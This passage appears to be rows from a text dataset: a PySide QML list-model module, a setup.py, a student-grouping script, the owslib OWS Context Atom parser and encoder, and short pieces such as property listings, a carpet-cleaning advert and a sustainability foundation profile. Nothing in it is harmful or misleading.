text
stringlengths 29
850k
|
|---|
# -*- coding: utf-8 -*-
#----------------------------------------------------------------------------
# A modRana QML GUI list models
#----------------------------------------------------------------------------
# Copyright 2013, Martin Kolman
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#---------------------------------------------------------------------------
# QML list model handling
from PySide import QtCore
# partially based on the gPodderListModel
# list model
class BaseListModel(QtCore.QAbstractListModel):
    """Generic Qt list model exposing a flat list of Python objects to QML.

    Each backing object is published under the single role name 'data'
    (role id 0).  data() also answers role id 1 with the object's
    ``qsection`` attribute, but that role is not registered below —
    presumably a leftover of the commented-out setRoleNames() variant;
    confirm before relying on it.
    """

    def __init__(self, objects=None):
        # objects: optional initial backing list (stored by reference,
        # not copied)
        QtCore.QAbstractListModel.__init__(self)
        if objects is None:
            objects = []
        self._objects = objects
        # self.setRoleNames({0: 'data', 1: 'section'})
        self.setRoleNames({0: 'data'})

    def sort(self):
        # Unimplemented for the generic list model; subclasses may order
        # self._objects here.  reset() tells attached views to re-read
        # the whole model.
        self.reset()

    def insert_object(self, o):
        # append, then sort() — which also signals the views via reset()
        self._objects.append(o)
        self.sort()

    def remove_object(self, o):
        # removes the first occurrence; raises ValueError if absent
        self._objects.remove(o)
        self.reset()

    def set_objects(self, objects):
        # replace the backing list wholesale (by reference)
        self._objects = objects
        self.sort()

    def get_objects(self):
        # direct reference to the backing list, not a copy
        return self._objects

    def get_object(self, index):
        # index: QModelIndex supplied by the attached view
        return self._objects[index.row()]

    def rowCount(self, parent=QtCore.QModelIndex()):
        return len(self.get_objects())

    def data(self, index, role):
        # Qt model/view accessor: role 0 -> the object itself,
        # role 1 -> its section attribute (see class docstring)
        if index.isValid():
            if role == 0:
                return self.get_object(index)
            elif role == 1:
                return self.get_object(index).qsection
        return None
class NestedListModel(BaseListModel):
    """List model variant intended for nested (tree-like) item data."""

    def __init__(self):
        super(NestedListModel, self).__init__()
class ListItem(QtCore.QObject):
    """A list item holding arbitrary data plus an optional list of children.

    Exposed to QML: the 'data' property, the 'childrenCount' property and
    the _getChild() slot for indexed child access.
    """

    def __init__(self, data, children=None):
        QtCore.QObject.__init__(self)
        self._data = data
        # only build a fresh list when no children are supplied, so a
        # caller-provided list stays shared with the caller
        self._children = [] if children is None else children

    changed = QtCore.Signal()
    childrenChanged = QtCore.Signal()

    def _getData(self):
        return self._data

    def _getChildCount(self):
        return len(self._children)

    @QtCore.Slot(int, result=QtCore.QObject)
    def _getChild(self, index):
        """Return the child at *index*, or None when out of bounds."""
        try:
            return self._children[index]
        except IndexError:
            # index out of bounds
            return None

    data = QtCore.Property(QtCore.QObject, _getData, notify=changed)
    # BUG FIX: the property type was declared QtCore.QObject although
    # _getChildCount() returns an int
    childrenCount = QtCore.Property(int, _getChildCount,
                                    notify=childrenChanged)
# NOTE(review): this re-definition shadows the fully featured ListItem
# declared above, making that implementation unreachable through this
# module's namespace — confirm which one is intended and remove the other.
class ListItem(QtCore.QObject):
    pass
|
Three family home located in the Glenville neighborhood close to East Blvd & St Clair. Updated units, two units are occupied with tenants. Includes full unfinished basement. Each floor has kitchen, living and dining rooms. Third floor unit has one bedroom, second floor has enclosed sun porch. Great potential and generating income. A must see!
Well maintained Investment property. Single family. Long term tenant. Rent income is 850.00 a month.
|
#!/usr/bin/env python
"""Setuptools packaging script for django-dps."""
import os

from setuptools import setup, find_packages

# if there's a converted (rst) readme, use it, otherwise fall back to markdown
if os.path.exists('README.rst'):
    readme_path = 'README.rst'
else:
    readme_path = 'README.md'

# Read the version without importing the package (avoids triggering its
# import-time dependencies).  Executing the file defines __version__.
# Context managers ensure the file handles are closed (the previous
# bare open(...).read() calls leaked them).
with open('dps/_version.py') as version_file:
    exec(version_file.read())

with open(readme_path) as readme_file:
    long_description = readme_file.read()

setup(
    name='django-dps',
    version=__version__,
    packages=find_packages(),
    license='BSD License',
    url="https://github.com/gregplaysguitar/django-dps/",
    maintainer="Greg Brown",
    maintainer_email="greg@gregbrown.co.nz",
    description='Django integrations for the DPS payment gateway',
    long_description=long_description,
    install_requires=[
        'Django>=1.7',
    ],
    include_package_data=True,
    package_data={},
    classifiers=[
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Framework :: Django',
        'License :: OSI Approved :: BSD License',
    ],
)
|
Rucore was established in 1991. The name Rucore originally stood for Rural Education Development Corporation, now the Rucore Sustainability Foundation, given our focus on rural areas and development through education and long term partnerships.
For the past 22 years Rucore has tested its sustainability thinking at various communities across South Africa, notably at Tlholego Ecovillage (outside Rustenburg in the North West Province). Tlholego is one of the earliest experimental permaculture and ecovillage communities developed in South Africa. The Ecovillage is living testimony to Rucore’s work, a growing cross-cultural community that sustains itself through food production and products, education and training, events and consulting. Two of the directors currently live there as part of the community, constantly applying their thinking at the grassroots level.
At the same time Rucore has been involved in other sustainable community projects, notably rainwater harvesting, food gardening and sanitation at Thandanani (in the Mambulu Village near Kranskop in Kwazulu Natal) for the past 15 years. In 2011 Rucore became involved in pioneering ecologically sustainable sanitation technology at Cata Village in the Eastern Cape. Rucore is currently working with emerging farmers in Skuinsdrift area to develop a Multi-purpose Centre and enterprise hub based on traditional building technologies and organic farming.
|
#!/usr/bin/env python
# simple script to select groups of students at random.
# Written by Bill Kronholm
# Sep 1, 2014
# No rights reserved.
#
# Fixes: broken shebang ("#!/usr/bin python"), Python-2-only print
# statements, true-division bug under Python 3, unclosed file handles,
# and text written to the binary lpr pipe.
from random import shuffle
from time import strftime
import subprocess  # used for printing

# list of students names as strings
students = [
    "Karmen Rosebrock",
    "Erna Halm",
    "Krystle Poage",
    "Dori Renick",
    "Scot Mayr",
    "Kenyetta Fyock",
    "Nicola Wind",
    "Janee Garibaldi",
    "Dot Tinkham",
    "Kathy Christian",
    "Kym Costigan",
    "Sharolyn Rondon",
    "Samira Poudrier",
    "Cythia Licon",
    "Madelene Sherry",
    "Ignacia Riemann",
    "Vince Edmundson",
    "Sharyl Buch",
    "Mayola Balk",
    "Leonia Simek"
]

groupsize = 3  # how many people in each group


def make_groups(names, size):
    """Shuffle *names* and deal them round-robin into len(names)//size groups.

    Leftover students (when *size* does not divide the class evenly) are
    spread over the first groups, matching the original round-robin
    behaviour.  At least one group is always created.

    :param names: sequence of student names (left unmodified)
    :param size: target number of people per group
    :return: dict mapping group number -> list of names
    """
    number_of_groups = max(1, len(names) // size)
    pool = list(names)  # copy so the caller's list is untouched
    shuffle(pool)       # randomize the order
    groups = {n: [] for n in range(number_of_groups)}
    for i, name in enumerate(pool):
        groups[i % number_of_groups].append(name)
    return groups


def main():
    """Build the groups, save them to a date-stamped txt file, print it."""
    groups = make_groups(students, groupsize)

    # print the groups and save them to a txt file named after today's date
    filename = strftime("%Y%m%d") + ".txt"
    with open(filename, 'w') as f:
        for key in sorted(groups):
            print("Group", key)
            f.write("Group " + str(key) + "\n")
            for name in groups[key]:
                print(name)
                f.write(name + "\n")
            print("")
            f.write("\n")

    # send the txt file to the default printer; approach taken from
    # http://stackoverflow.com/questions/12723818/print-to-standard-printer-from-python
    with open(filename, 'r') as f:
        lpr = subprocess.Popen("/usr/bin/lpr", stdin=subprocess.PIPE)
        lpr.stdin.write(f.read().encode())  # pipe expects bytes
        lpr.stdin.close()

    print("Done. Go check the printer.")


if __name__ == "__main__":
    main()
|
Welcome to my site, My name is Andy Hogarth and I am a LOCAL, friendly and family based carpet cleaner with 10 years experience in carpet cleaning, I strive for perfection in all my carpets.
I run a powerful truck-mounted unit, a machine that boasts excellent results with rapid dry times, providing its own power source, water supply and waste water removal.
Catering for domestic and commercial clients at a time to suit.
Please feel free to contact me with any queries or to book a free, no obligation survey. Thank you for visiting my site.
My standard clean is a hot water extraction clean using my truck mounted unit, using specially selected pre sprays bespoke to your needs and level of soiling I can clean and rinse your carpets and upholstery to very high standards.
Eco-clean is a safer option for the environment, the product used is an optimized colloidal agent which holds oil & dirt in colloidal suspension with no re-deposition fully flushed out with a high powered fresh water rinse.
From domestic dry compound cleaning for light soiling to ‘encapsulation’ cleaning using a powerful Cimex tri-rotating floor machine for commercial areas. Perfect for office and business environments.
|
# -*- coding: utf-8 -*-
# =============================================================================
# Authors : Alexander Kmoch <allixender@gmail.com>
#
# =============================================================================
"""
API for OGC Web Services Context Document (OWS Context) format.
ATOM XML Encoding: http://www.opengeospatial.org/standards/owc
OGC OWS Context Atom Encoding Standard 1.0 (12-084r2)
"""
from owslib.etree import etree, ParseError
from owslib import util
from owslib.namespaces import Namespaces
from owslib.util import nspath_eval, element_to_string
from owslib.util import log
from owslib.owscontext.common import is_empty, extract_p, \
try_int, try_float
# default variables
add_namespaces = {"georss": "http://www.georss.org/georss",
"owc": "http://www.opengis.net/owc/1.0",
"xml": "http://www.w3.org/XML/1998/namespace"}
def get_namespaces():
    """Assemble the namespace map used throughout this module.

    Combines the common OWSLib namespaces with the module-level
    additions and maps the default (None) prefix to atom.
    """
    manager = Namespaces()
    namespaces = manager.get_namespaces(
        ["atom", "dc", "gml", "gml32", "xlink"])
    namespaces.update(add_namespaces)
    namespaces[None] = manager.get_namespace("atom")
    return namespaces
ns = get_namespaces()
def nspv(path):
    """Expand a prefixed xpath using this module's namespace map.

    Short-hand syntax seen in waterml2.py.

    :param path: namespace-prefixed xpath, e.g. 'atom:title'
    :return: the namespace-expanded path string
    """
    return nspath_eval(path, ns)
def ns_elem(ns_prefix, elem_name):
    """Build a Clark-notation '{uri}name' tag for *elem_name*.

    :param ns_prefix: prefix to look up in the module namespace map
    :param elem_name: local element name
    :return: '{namespace-uri}elem_name', or None for an unknown prefix
    """
    ns_uri = ns.get(ns_prefix)
    if ns_uri is None:
        return None
    return "{%s}%s" % (ns_uri, elem_name)
def parse_owc_content(content_node):
    """Parse an owc:content (or owc:request) element into a plain dict.

    :param content_node: xml element of the owc content node
    :return: dict with 'type', 'url', 'title' attributes and 'content'
        holding the serialised first child element
    """
    mimetype = util.testXMLAttribute(content_node, 'type')
    url = util.testXMLAttribute(content_node, 'href')
    title = util.testXMLAttribute(content_node, 'title')
    child_elem = None
    if len(list(content_node)) > 0:
        # serialise the first child element back into markup text
        child_elem = element_to_string(
            list(content_node)[0], False)
    content_dict = {
        "type": mimetype,
        "url": url,
        # NOTE(review): str() maps a missing child to the literal string
        # "None" (and a bytes result to "b'..'") — confirm downstream
        # consumers expect this
        "content": str(child_elem),
        "title": title
    }
    return content_dict
def parse_entry(entry_node):
    """
    parse an atom entry into a feature/resource dict to build OwcResource from

    :param entry_node: xml element root node of the atom:entry
    :return: dictionary for OwcResource.from_dict()
    """
    resource_base_dict = {
        "type": "Feature",
        "id": None,
        "geometry": None,
        "properties": {
            'title': None,
            'abstract': None,
            'updated': None,
            'date': None,
            'authors': [],
            'publisher': None,
            'rights': None,
            'categories': [],
            "links": {
                "alternates": [],
                "previews": [],
                "data": [],
                "via": [],
            },
            'offerings': [],
            'active': None,
            'minscaledenominator': None,
            'maxscaledenominator': None,
            'folder': None
        }
    }

    # <id>ftp://ftp.remotesensing.org/pub/geotiff/samples/gdal_eg/cea.txt</id>
    val = entry_node.find(util.nspath_eval('atom:id', ns))
    id = util.testXMLValue(val)
    resource_base_dict.update({"id": id})

    # <title>GeoTIFF Example</title>
    val = entry_node.find(util.nspath_eval('atom:title', ns))
    title = util.testXMLValue(val)
    resource_base_dict['properties'].update({"title": title})

    # <updated>2011-11-01T00:00:00Z</updated>
    val = entry_node.find(util.nspath_eval('atom:updated', ns))
    update_date = util.testXMLValue(val)
    resource_base_dict['properties'].update({"updated": update_date})

    # <dc:publisher>
    val = entry_node.find(util.nspath_eval('dc:publisher', ns))
    publisher = util.testXMLValue(val)
    resource_base_dict['properties'].update({"publisher": publisher})

    # <dc:rights>
    val = entry_node.find(util.nspath_eval('dc:rights', ns))
    rights = util.testXMLValue(val)
    resource_base_dict['properties'].update({"rights": rights})

    # <georss:where> — geometry is kept as the serialised first child
    val = entry_node.find(util.nspath_eval('georss:where', ns))
    if val is not None:
        if len(list(val)) > 0:
            # TODO here parse geometry??
            xmltxt = element_to_string(
                list(val)[0], False)
            resource_base_dict.update({"geometry": xmltxt.decode('utf-8')})

    # <content type="text"> aka subtitle, aka abstract
    val = entry_node.find(util.nspath_eval('atom:content', ns))
    subtitle = util.testXMLValue(val)
    resource_base_dict['properties'].update({"abstract": subtitle})

    # <author><name>..</name><email>..</email><uri>..</uri></author>
    vals = entry_node.findall(util.nspath_eval('atom:author', ns))
    authors = []
    for val in vals:
        val_name = val.find(util.nspath_eval('atom:name', ns))
        val_email = val.find(util.nspath_eval('atom:email', ns))
        val_uri = val.find(util.nspath_eval('atom:uri', ns))
        author = {
            "name": util.testXMLValue(val_name),
            "email": util.testXMLValue(val_email),
            "uri": util.testXMLValue(val_uri)
        }
        if not is_empty(author):
            authors.append(author)
    resource_base_dict['properties'].update({"authors": authors})

    # <link rel="enclosure" type="image/png"
    #       length="12345" title="..." href="http://o..."/>
    # <link rel="icon" type="image/png" title="Preview f..."
    #       href="http://..."/>
    # <link rel="via" type="application/vnd.ogc.wms_xml"
    #       title="Original .." href="...."/>
    vals = entry_node.findall(util.nspath_eval('atom:link', ns))
    links_alternates = []
    links_previews = []
    links_data = []
    links_via = []
    for val in vals:
        link = {
            "href": util.testXMLAttribute(val, 'href'),
            "type": util.testXMLAttribute(val, 'type'),
            "length": util.testXMLAttribute(val, 'length'),
            "lang": util.testXMLAttribute(val, 'lang'),
            "title": util.testXMLAttribute(val, 'title'),
            "rel": util.testXMLAttribute(val, 'rel')
        }
        # dispatch on the atom link relation
        if link.get("rel") == "alternate" and not is_empty(link):
            links_alternates.append(link)
        elif link.get("rel") == "icon" and not is_empty(link):
            links_previews.append(link)
        elif link.get("rel") == "enclosure" and not is_empty(link):
            links_data.append(link)
        elif link.get("rel") == "via" and not is_empty(link):
            links_via.append(link)
        else:
            log.warning(
                "unknown link type in Ows Resource entry section: %r", link)

    resource_base_dict['properties']['links'].update(
        {"alternates": links_alternates})
    resource_base_dict['properties']['links'].update(
        {"previews": links_previews})
    resource_base_dict['properties']['links'].update({"data": links_data})
    resource_base_dict['properties']['links'].update({"via": links_via})

    # <owc:offering code="http://www.opengis.net/spec/owc-at...">
    #   <owc:content type="image/tiff" href=".."
    #   <owc:operation code="GetCapabilities" method="GET"
    #       type="applica..." href="..."
    #     <owc:request type="application/xml"> ..
    #   <owc:styleSet>
    #     <owc:name>raster</owc:name>
    #     <owc:title>Default Raster</owc:title>
    #     <owc:abstract>A sample style that draws a </owc:abstract>
    #     <owc:legendURL href="h...." type="image/png"/>
    #   </owc:styleSet>
    offering_nodes = entry_node.findall(util.nspath_eval('owc:offering', ns))
    offerings = []
    for offering_node in offering_nodes:
        offering_code = util.testXMLAttribute(offering_node, 'code')
        operations = []
        contents = []
        styles = []

        operation_nodes = offering_node.findall(
            util.nspath_eval('owc:operation', ns))
        for op_val in operation_nodes:
            operations_code = util.testXMLAttribute(op_val, 'code')
            http_method = util.testXMLAttribute(op_val, 'method')
            mimetype = util.testXMLAttribute(op_val, 'type')
            request_url = util.testXMLAttribute(op_val, 'href')
            # BUG FIX: was val.find(...), reusing the stale loop variable
            # from the atom:link loop above — owc:request was never read
            # from the operation node itself
            req_content_val = op_val.find(util.nspath_eval('owc:request', ns))
            req_content = None
            if req_content_val is not None:
                req_content = parse_owc_content(req_content_val)
            # TODO no example for result/response
            op_dict = {
                "code": operations_code,
                "method": http_method,
                "type": mimetype,
                "href": request_url,
                "request": None if is_empty(req_content) else req_content,
                "result": None
            }
            if not is_empty(op_dict):
                operations.append(op_dict)

        content_nodes = offering_node.findall(
            util.nspath_eval('owc:content', ns))
        for cont_val in content_nodes:
            content_dict = parse_owc_content(cont_val)
            if not is_empty(content_dict):
                contents.append(content_dict)

        style_nodes = offering_node.findall(
            util.nspath_eval('owc:styleSet', ns))
        for style_val in style_nodes:
            val_name = style_val.find(util.nspath_eval('owc:name', ns))
            val_title = style_val.find(util.nspath_eval('owc:title', ns))
            val_abstr = style_val.find(util.nspath_eval('owc:abstract', ns))
            val_uri = style_val.find(util.nspath_eval('owc:legendURL', ns))
            style_set = {
                "name": util.testXMLValue(val_name),
                "title": util.testXMLValue(val_title),
                "abstract": util.testXMLValue(val_abstr),
                "default": None,
                "legendURL": util.testXMLAttribute(val_uri, 'href'),
                "content": None
            }
            if not is_empty(style_set):
                styles.append(style_set)

        offering_dict = {
            "code": offering_code,
            "operations": operations,
            "contents": contents,
            "styles": styles
        }
        # offerings without a code attribute are dropped
        if offering_code is not None:
            offerings.append(offering_dict)

    resource_base_dict['properties'].update(
        {"offerings": offerings})

    # TODO no examples for active attribute

    # <owc:minScaleDenominator>2500</owc:minScaleDenominator>
    val = entry_node.find(util.nspath_eval('owc:minScaleDenominator', ns))
    resource_base_dict['properties'].update(
        {"minscaledenominator": util.testXMLValue(val)})

    # <owc:maxScaleDenominator>25000</owc:maxScaleDenominator>
    val = entry_node.find(util.nspath_eval('owc:maxScaleDenominator', ns))
    resource_base_dict['properties'].update(
        {"maxscaledenominator": util.testXMLValue(val)})

    # TODO no examples for folder attribute

    return resource_base_dict
def decode_atomxml(xml_string):
    """
    parse atom xml encoding into a dict for instantiating an OwcContext

    :param xml_string: the atom-encoded OWS Context document
    :return: OwcContext-ready dict
    """
    context_base_dict = {
        "type": "FeatureCollection",
        "id": None,
        "bbox": None,
        "properties": {
            "lang": None,
            "links": {
                "profiles": [],
                "via": [],
            },
            'title': None,
            'abstract': None,
            'updated': None,
            'authors': [],
            'publisher': None,
            'generator': None,
            'display': None,
            'rights': None,
            'date': None,
            'categories': [],
        },
        'features': []
    }
    feed_root = etree.fromstring(xml_string)

    # feed xml:lang=en
    lang = util.testXMLAttribute(
        feed_root, '{http://www.w3.org/XML/1998/namespace}lang')
    context_base_dict['properties'].update({"lang": lang})

    # <id>
    val = feed_root.find(util.nspath_eval('atom:id', ns))
    id = util.testXMLValue(val)
    context_base_dict.update({"id": id})

    # <link rel="profile"
    #       href="http://www.opengis.net/spec/owc-atom/1.0/req/core"
    #       title="compliant bla bla"
    # <link rel="via" type="application/xml" href="..." title="..."
    vals = feed_root.findall(util.nspath_eval('atom:link', ns))
    links_profile = []
    links_via = []
    for val in vals:
        link = {
            "href": util.testXMLAttribute(val, 'href'),
            "type": util.testXMLAttribute(val, 'type'),
            "length": util.testXMLAttribute(val, 'length'),
            "lang": util.testXMLAttribute(val, 'lang'),
            "title": util.testXMLAttribute(val, 'title'),
            "rel": util.testXMLAttribute(val, 'rel')
        }
        if link.get("rel") == "profile" and not is_empty(link):
            links_profile.append(link)
        elif link.get("rel") == "via" and not is_empty(link):
            links_via.append(link)
        else:
            log.warning("unknown link type in Ows Context section: %r", link)

    context_base_dict['properties']['links'].update(
        {"profiles": links_profile})
    context_base_dict['properties']['links'].update({"via": links_via})

    # <title>
    val = feed_root.find(util.nspath_eval('atom:title', ns))
    title = util.testXMLValue(val)
    context_base_dict['properties'].update({"title": title})

    # <subtitle type = "html"
    val = feed_root.find(util.nspath_eval('atom:subtitle', ns))
    subtitle = util.testXMLValue(val)
    context_base_dict['properties'].update({"abstract": subtitle})

    # <author><name>..</name><email>..</email><uri>..</uri></author>
    vals = feed_root.findall(util.nspath_eval('atom:author', ns))
    authors = []
    for val in vals:
        val_name = val.find(util.nspath_eval('atom:name', ns))
        val_email = val.find(util.nspath_eval('atom:email', ns))
        val_uri = val.find(util.nspath_eval('atom:uri', ns))
        author = {
            "name": util.testXMLValue(val_name),
            "email": util.testXMLValue(val_email),
            "uri": util.testXMLValue(val_uri)
        }
        if not is_empty(author):
            authors.append(author)
    context_base_dict['properties'].update({"authors": authors})

    # <georss:where>
    val = feed_root.find(util.nspath_eval('georss:where', ns))
    if val is not None:
        if len(list(val)) > 0:
            xmltxt = element_to_string(
                list(val)[0], False)
            # BUG FIX: 'bbox' is a top-level key of context_base_dict
            # (see the template above, parallel to 'geometry' in
            # parse_entry); it was previously written into 'properties'
            # where the template declares no such key
            context_base_dict.update({"bbox": xmltxt.decode('utf-8')})

    # <updated>2012-11-04T17:26:23Z</updated>
    val = feed_root.find(util.nspath_eval('atom:updated', ns))
    update_date = util.testXMLValue(val)
    context_base_dict['properties'].update({"updated": update_date})

    # <dc:date>2009-01-23T09:08:56.000Z/2009-01-23T09:14:08.000Z</dc:date>
    val = feed_root.find(util.nspath_eval('dc:date', ns))
    time_interval_of_interest = util.testXMLValue(val)
    context_base_dict['properties'].update(
        {"date": time_interval_of_interest})

    # <rights>
    val = feed_root.find(util.nspath_eval('atom:rights', ns))
    rights = util.testXMLValue(val)
    context_base_dict['properties'].update({"rights": rights})

    # <dc:publisher>
    val = feed_root.find(util.nspath_eval('dc:publisher', ns))
    publisher = util.testXMLValue(val)
    context_base_dict['properties'].update({"publisher": publisher})

    # <owc:display><owc:pixelWidth>... — all three children optional
    val_display = feed_root.find(util.nspath_eval('owc:display', ns))
    val_pixel_width = None if val_display is None \
        else val_display.find(util.nspath_eval('owc:pixelWidth', ns))
    val_pixel_height = None if val_display is None \
        else val_display.find(util.nspath_eval('owc:pixelHeight', ns))
    val_mm_per_pixel = None if val_display is None \
        else val_display.find(util.nspath_eval('owc:mmPerPixel', ns))
    owc_display = {
        "pixelWidth": util.testXMLValue(val_pixel_width),
        "pixelHeight": util.testXMLValue(val_pixel_height),
        "mmPerPixel": util.testXMLValue(val_mm_per_pixel)
    }
    if not is_empty(owc_display):
        context_base_dict['properties'].update({"display": owc_display})

    # <generator uri="http://w.." version="1.0">MiraMon</generator>
    val = feed_root.find(util.nspath_eval('atom:generator', ns))
    owc_generator = {
        "name": util.testXMLValue(val),
        "version": util.testXMLAttribute(val, 'version'),
        "uri": util.testXMLAttribute(val, 'uri')
    }
    if not is_empty(owc_generator):
        context_base_dict['properties'].update({"generator": owc_generator})

    # <category term="maps" label="This file contains maps"/>
    vals = feed_root.findall(util.nspath_eval('atom:category', ns))
    categories = []
    for val in vals:
        category = {
            "term": util.testXMLAttribute(val, 'term'),
            "scheme": util.testXMLAttribute(val, 'scheme'),
            "label": util.testXMLAttribute(val, 'label')
        }
        if not is_empty(category):
            categories.append(category)
    context_base_dict['properties'].update({"categories": categories})

    # <entry> ... one feature/resource per atom entry
    entries = feed_root.findall(util.nspath_eval('atom:entry', ns))
    resources = []
    for entry in entries:
        entry_dict = parse_entry(entry)
        if entry_dict.get("id") is not None:
            resources.append(entry_dict)
        else:
            log.warning("feature entry has no id, not allowed: skipping!")
    context_base_dict.update({"features": resources})

    return context_base_dict
def encode_atomxml(obj_d):
    """
    encode instance of OwcContext dict into atom xml encoding,
    because we can't do circular imports

    :param obj_d: the dict from owscontext to dict
    :return: b'atomxml'
    """
    # encoding errors (TypeError / AttributeError / ValueError /
    # ParseError) deliberately propagate to the caller; the previous
    # commented-out try/except scaffolding re-raised them anyway
    xml_tree = axml_context(obj_d)
    tree = etree.ElementTree(xml_tree)
    return element_to_string(tree, encoding='utf-8', xml_declaration=False)
def axml_context(d):
    """
    encodes base OwcContext as dict to atom xml tree

    :param d: the OwcContext as dict
    :return: etree 'feed' Element
    """
    xml = etree.Element("feed", nsmap=ns)
    etree.SubElement(xml, "id").text = d['id']

    # plain for-loops instead of side-effect-only list comprehensions
    spec_reference = [axml_link(do) for do in
                      extract_p('properties.links.profiles', d, [])]
    for el in spec_reference:
        if el is not None:
            xml.append(el)

    area_of_interest = extract_p('bbox', d, None)
    if area_of_interest is not None:
        try:
            gml = etree.fromstring(area_of_interest)
            georss = etree.SubElement(xml, ns_elem("georss", "where"))
            georss.append(gml)
        except Exception as ex:
            # BUG FIX: the exception must be passed as a lazy %-argument;
            # a bare extra argument broke the log call's formatting
            log.warning('could not encode bbox into georss:where: %s', ex)

    context_metadata = [axml_link(do) for do in
                        extract_p('properties.links.via', d, [])]
    for el in context_metadata:
        if el is not None:
            xml.append(el)

    language = extract_p('properties.lang', d, None)
    if language is not None:
        xml.set(ns_elem("xml", "lang"), language)

    title = extract_p('properties.title', d, None)
    if title is not None:
        etree.SubElement(xml, "title").text = title

    # <subtitle type = "html"
    subtitle = extract_p('properties.abstract', d, None)
    if subtitle is not None:
        etree.SubElement(xml, "subtitle").text = subtitle

    update_date = extract_p('properties.updated', d, None)
    if update_date is not None:
        etree.SubElement(xml, "updated").text = update_date

    authors = [axml_author(do) for do in
               extract_p('properties.authors', d, [])]
    for el in authors:
        if el is not None:
            xml.append(el)

    publisher = extract_p('properties.publisher', d, None)
    if publisher is not None:
        etree.SubElement(xml, ns_elem("dc", "publisher")).text = publisher

    creator_application = axml_creator_app(
        extract_p('properties.generator', d, None))
    if creator_application is not None and not is_empty(creator_application):
        xml.append(creator_application)

    creator_display = axml_display(extract_p('properties.display', d, None))
    if creator_display is not None:
        xml.append(creator_display)

    rights = extract_p('properties.rights', d, None)
    if rights is not None:
        etree.SubElement(xml, "rights").text = rights

    time_interval_of_interest = extract_p('properties.date', d, None)
    if time_interval_of_interest is not None:
        etree.SubElement(xml, ns_elem("dc", "date")).text = \
            time_interval_of_interest

    keywords = [axml_category(do) for do in
                extract_p('properties.categories', d, [])]
    for el in keywords:
        if el is not None:
            xml.append(el)

    # here we generate single elements and attach them
    resources = [axml_resource(do) for do in
                 extract_p('features', d, [])]
    for el in resources:
        if el is not None:
            xml.append(el)

    return xml
def axml_resource(d):
    """
    encodes an OwcResource as dict into atom xml tree

    :param d: the OwcResource as dict
    :return: etree 'entry' Element
    """
    entry = etree.Element("entry", nsmap=ns)
    etree.SubElement(entry, "id").text = d['id']

    geospatial_extent = extract_p('geometry', d, None)
    if geospatial_extent is not None:
        try:
            gml = etree.fromstring(geospatial_extent)
            georss = etree.SubElement(entry, ns_elem("georss", "where"))
            georss.append(gml)
        except Exception as ex:
            # exception passed as lazy %-arg (bare extra arg broke the
            # log call's formatting)
            log.warning('could not encode geometry into georss:where: %s', ex)

    title = d['properties']['title']
    if title is not None:
        etree.SubElement(entry, "title").text = title

    # <content type="text"> carries the abstract
    subtitle = extract_p('properties.abstract', d, None)
    if subtitle is not None:
        etree.SubElement(entry, "content").text = subtitle

    update_date = extract_p('properties.updated', d, None)
    if update_date is not None:
        etree.SubElement(entry, "updated").text = update_date

    for el in (axml_author(do) for do in
               extract_p('properties.authors', d, [])):
        if el is not None:
            entry.append(el)

    publisher = extract_p('properties.publisher', d, None)
    # BUG FIX: guard tested update_date (copy-paste), so a publisher was
    # written (possibly as None) whenever an update date existed
    if publisher is not None:
        etree.SubElement(entry, ns_elem("dc", "publisher")).text = publisher

    rights = extract_p('properties.rights', d, None)
    # BUG FIX: same copy-paste guard as above, fixed to test rights
    if rights is not None:
        etree.SubElement(entry, ns_elem("dc", "rights")).text = rights

    temporal_extent = extract_p('properties.date', d, None)
    if temporal_extent is not None:
        # NOTE(review): written as a plain <date> element here, whereas
        # axml_context emits dc:date for the same field — confirm which
        # encoding the spec requires
        etree.SubElement(entry, "date").text = temporal_extent

    for el in (axml_category(do) for do in
               extract_p('properties.categories', d, [])):
        if el is not None:
            entry.append(el)

    for el in (axml_link(do) for do in
               extract_p('properties.links.via', d, [])):
        if el is not None:
            entry.append(el)

    for el in (axml_content(do) for do in
               extract_p('properties.links.alternates', d, [])):
        if el is not None:
            entry.append(el)

    # BUG FIX: the parse side stores preview links under
    # 'properties.links.previews' (plural); the singular key used here
    # always yielded an empty list, silently dropping previews
    for el in (axml_link(do) for do in
               extract_p('properties.links.previews', d, [])):
        if el is not None:
            entry.append(el)

    for el in (axml_link(do) for do in
               extract_p('properties.links.data', d, [])):
        if el is not None:
            entry.append(el)

    for el in (axml_offering(do) for do in
               extract_p('properties.offerings', d, [])):
        if el is not None:
            entry.append(el)

    # TODO no examples for active attribute
    active = extract_p('properties.active', d, None)
    if active is not None:
        etree.SubElement(entry, "active").text = active

    # <owc:minScaleDenominator>2500</owc:minScaleDenominator>
    min_scale_denominator = try_float(extract_p(
        'properties.minscaledenominator', d, None))
    if min_scale_denominator is not None:
        etree.SubElement(entry, ns_elem(
            "owc", "minScaleDenominator")).text = str(min_scale_denominator)

    # <owc:maxScaleDenominator>25000</owc:maxScaleDenominator>
    max_scale_denominator = try_float(extract_p(
        'properties.maxscaledenominator', d, None))
    if max_scale_denominator is not None:
        etree.SubElement(entry, ns_elem(
            "owc", "maxScaleDenominator")).text = str(max_scale_denominator)

    # TODO no examples for folder attribute
    folder = extract_p('properties.folder', d, None)
    if folder is not None:
        etree.SubElement(entry, "folder").text = folder

    return entry
def axml_creator_app(d):
    """Encode an OwcCreatorApplication dict as an atom <generator> element.

    <generator uri="http://w.." version="1.0">MiraMon</generator>

    :param d: dict with optional 'title', 'uri', 'version' keys
    :return: etree Element, or None if *d* is empty or encoding fails
    """
    if is_empty(d):
        return None
    try:
        creator_app = etree.Element("generator", nsmap=ns)
        title = extract_p('title', d, None)
        if title is not None:
            creator_app.text = title
        uri = extract_p('uri', d, None)
        if uri is not None:
            creator_app.set("uri", uri)
        version = extract_p('version', d, None)
        if version is not None:
            creator_app.set("version", version)
        return creator_app
    except Exception as ex:
        # BUG FIX: the exception must be a lazy %-argument; a bare extra
        # argument broke the log call's string formatting
        log.warning('could not encode creator_app: %s', ex)
        return None
def axml_display(d):
    """Encode an OwcDisplay dict as an <owc:display> element.

